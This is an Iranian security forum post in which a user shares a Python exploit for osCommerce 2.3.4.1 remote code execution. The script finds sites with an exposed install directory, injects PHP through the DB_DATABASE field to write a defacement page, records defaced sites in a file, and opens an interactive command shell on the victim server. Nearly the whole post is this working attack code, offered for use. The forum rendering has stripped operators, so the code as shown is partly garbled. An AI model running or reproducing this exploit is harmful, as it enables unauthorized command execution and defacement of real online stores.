انجمن تیم امنیتی ایران سایبر

Security Oscommerce 2.3.4.1 - Remote Code Execution Exploit

شروع موضوع توسط JOK3R ‏20/7/18 در انجمن تحلیل و بررسی آسیب پذیری های سایت و سرورها

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. JOK3R

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏22/10/14
    ارسال ها:
    445
    تشکر شده:
    2,098
    جنسیت:
    محل سکونت:
    dreams
    Name:
    james
    Main os:
    Windows


    اکسپلویتی برای آسیب پذیری اخیر OsCommerce نوشتم گفتم با شما هم به اشتراک بگذارم
    PHP:
    # Exploit Title: OsCommerce 2.3.4.1 - Remote Code Execution Exploit[/B][/LEFT]
    [B][LEFT]
    # Date: 31-03-2018
    # Exploit Author: iran-cyber
    # Vendor Homepage: oscommerce.com
    # Software Link: library.oscommerce.com/Online&en&oscom_2_3&release_notes&v2_3_4_1
    # Version: 2.3.4.1
    # Tested on: windows/linux

    #!/usr/bin/python27
    # https://github.com/04x/OsCommerce2-3RceExploit
    # https://www.youtube.com/watch?v=y_LQGnDyq80
    # https://0day.today/exploit/30088
    # Automatic Upload shell And Index
    # Developed By ICG
    import requestssysos

    Banner 
    '''

               osCommerce 2.3 Remote Code Execution Exploit
                         0day.today/exploit/30088
                   Exploit Developed By Iran-cyber.Net          
                            White HaT Hackers
                         
    '''


    def cls():
        
    linux 'clear'
        
    windows 'cls'
        
    os.system([linuxwindows][os.name == 'nt'])





    def osCommerce(site):
        try:
            
    CheckVuln requests.get('http://' site '/install/index.php'timeout=5)
            if 
    'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
                print(
    '     [+] ' site ' --> vulnerable!')
                print(
    '     [+] ' site ' --> Posting Payload...')
                
    Exp site '/install/install.php?step=4'
                
    data = {
                    
    'DIR_FS_DOCUMENT_ROOT''./'
                
    }
                
    deface '\');'
                
    deface += 'system("echo Vuln!! patch it Now!> ../../vuln.html");'
                
    deface += '/*'
                
    data['DB_DATABASE'] = deface
                r 
    requests.post(url='http://' Expdata=datatimeout=5)
                if 
    r.status_code == 200:
                    print(
    '     [+] ' site ' --> Payload Sent Successfully!')
                    
    requests.get('http://' site '/install/includes/configure.php'timeout=5)
                    
    CheckIndex requests.get('http://' site '/vuln.html'timeout=5)
                    if 
    'Vuln!!' in CheckIndex.text.encode('utf-8'):
                        print(
    '     [+] ' site '/vuln.html --> Deface Uploaded')
                        
    with open('deface.txt''a') as writer:
                            
    writer.write(site '/vuln.html' '\n')
                        try:
                            
    flag True
                            
    while flag:
                                
    cm raw_input(' ICG-Shell$ ')
                                if 
    cm == 'Exit' or cm == 'exit':
                                    
    flag False
                                    
    break
                                
    shell '\');'
                                
    shell += 'system("echo 0day-------");'
                                
    shell += 'system("' cm '");'
                                
    shell += '/*'
                                
    data['DB_DATABASE'] = shell
                                requests
    .post(url='http://' Expdata=datatimeout=5)
                                
    rez requests.get('http://' site '/install/includes/configure.php'timeout=5)
                                print(
    rez.text.encode('utf-8').split('0day-------')[1])
                        
    except:
                            
    pass
                    
    else:
                        print(
    '     [-] ' site ' --> payload OK but Index and Commend Not Executed!')
                else:
                    print(
    '     [-] ' site ' --> Payload Sent Not Successfully!')
            else:
                print(
    '     [-] ' site ' --> Not vulnerable!')
        
    except:
            print(
    '     [-] ' site ' --> Timeout or Url not valid!')


    if 
    __name__ == '__main__':
        try:
            
    url sys.argv[1]
        
    except:
            
    cls()
            print(
    Banner)
            print(
    '           -----------------------------------------')
            print(
    '              Usage: python Script.py target.com')
            
    sys.exit()

        if 
    url.startswith('http://'):
            
    url url.replace('http://''')
        
    elif url.startswith('https://'):
            
    url url.replace('https://''')
        else:
            
    pass
        cls
    ()
        print(
    Banner)
        
    osCommerce(url)


    PHP:
    https://github.com/04x/OsCommerce2-3RceExploit
     
    BlackRoot، Mkali07، MOHAMAD-NOFOZI و 4 نفر دیگر از این ارسال تشکر کرده اند.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .